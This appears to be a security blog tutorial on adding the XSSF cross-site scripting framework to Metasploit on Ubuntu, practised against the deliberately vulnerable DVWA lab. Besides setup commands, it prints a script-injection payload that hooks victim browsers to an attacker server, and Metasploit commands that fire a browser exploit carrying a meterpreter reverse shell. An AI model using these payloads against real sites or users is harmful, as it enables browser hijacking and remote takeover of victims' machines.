Security Street Knowledge
  • Add XSSF to Metasploit Framework on Ubuntu
  • What is XSSF or the Cross-site Scripting Framework?

    The XSS Framework (XSSF) is able to manage victims of a generic XSS attack and hold an existing connection with JavaScript loop refreshing in order to allow future browser-based attacks.  After injection of the generic attack (resource “loop” generated by XSSF), each victim will ask the attack server (every “x” seconds) if new commands are available:

    The advantage of having the project built within the Metasploit Framework is the ability to run browser exploits already included in MSF. Unlike the existing projects (BeEF, XeeK, XSSShell/XSSTunnel), XSSF gives the possibility to simply add and run attacks (using MSF modules), and execute already existing MSF exploits without installing third-party solutions.  MSF uses Ruby scripts to create a server listeners that wait for exploited browsers to connect.  In addition, the ability to create XSS tunnels with targeted victims is a real advantage.

    Video showing how XSSF works in MetaSploit

    You need to install or upgrade Flash Player to view this content, install or upgrade by clicking here.

    Video showing how XSSF Tunnel works

    You need to install or upgrade Flash Player to view this content, install or upgrade by clicking here.

     

     

    Setting up XSSF Framework for Metasploit on Ubuntu 10.10

     

    Download http://www.metasploit.com/redmine/attachments/596/XSSF.zip

     

    UNZIP and copy files into metasploit /msf3 directory

    cp -iR /home/user/Downloads/XSSF/data/ <space> /opt/metasploit3/msf3/
    cp -iR /home/user/Downloads/XSSF/lib/ <space> /opt/metasploit3/msf3/
    cp -iR /home/user/Downloads/XSSF/modules/ <space> /opt/metasploit3/msf3/
    cp -iR /home/user/Downloads/XSSF/plugins/ <space> /opt/metasploit3/msf3/

     

    RENAME XSSF.rb ruby script (it is wrong in zip file)

    mv /opt/metasploit3/msf3/plugins/XSSF.rb    <space> /opt/metasploit3/msf3/plugins/xssf.rb

     

    INSTALL MySQL IF NOT ALREADY INSTALLED

    Install MySQL with Synaptic or apt-get

    $ sudo apt-get install mysql-server mysql-client
    $ sudo apt-get install libmysql-ruby libmysqlclient-dev

     

    FIX MySQL ERROR: The database backend has not been initialized …

    gem install mysql

    (needed for XSSF to use MySQL driver)

     

     

    FIX RUBY ERRORS DURING START OF METASPLOIT (UPGRADE RUBY TO 1.9.1)

    apt-get install ruby1.9.1-full
    mv /usr/bin/ruby <space> ruby1.8_symlink
    cp -s ruby1.9.1 <space> ruby (-s to create a symbolic link to ruby version 1.9.1)

    SET GEM VERSION TO 1.9.1
    mv gem gem1.8_symlink
    cp -s gem1.9.1 <space> gem
    (-s to create a symbolic link to gem version 1.9.1)

    NOW YOU NEED A SITE WITH XSS VULNERABILITY EXPLOIT:

    Damn Vulnerable Web App LIVE CD

     

    EXPLOIT: On DVWA as a Reflective or Stored Cross-site Scripting attack

    http://server_ipaddress/?lang=”><script src=”http://xssf_ipaddress:8888/loop?interval=2″></script>

    OR THIS INTO SUBMIT FIELD ON PAGE
    “><script src=”http://xssf_ipaddres:8888/loop?interval=2″></script>

    you will see the victim page refresh every 2 secs

     

    START METASPLOIT

    $ /opt/metasploit3/msf3/msfconsole

    msf> svn update (to get latest exploits, plugins, modules)

     

    CONNECT METASPLOIT TO MYSQL DATABASE

    msf> db_driver mysql
    msf> db_connect user:pass@127.0.0.1:3306/msf3

    (use same pass as when you setup the mysql database above)

     

    USING METASPLOIT (XSSF):

    LOAD METASPLOIT XSSF AND TYPE
    msf> load XSSF (case-sensitive)

     

    Please run ‘http://ipaddress:8888/loop’ into any browser with JavaScript enabled

    msf> xssf_victims (note victim 1)
    msf> xssf_information 1
    msf> use auxiliary/xssf/alert
    msf> set AlertMessage XSS pop-up will appear
    msf> run

    USING METASPLOIT XSSF AUXILLARY MODULES:

    EXPLOIT BROWSER VIA XSSF WITH VULNERABILITY OF CHOICE

    msf> use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
    msf> set PAYLOAD windows/meterpreter/reverse_tcp
    msf> set LHOST 192.168.1.82
    msf> exploit
    msf> jobs
    msf> xssf_exploit 1 0

  • Comments: Off Category: Uncategorized
  • Tags: , , , , , , , , , , , , , ,

Comments are closed.

cyber3.jpg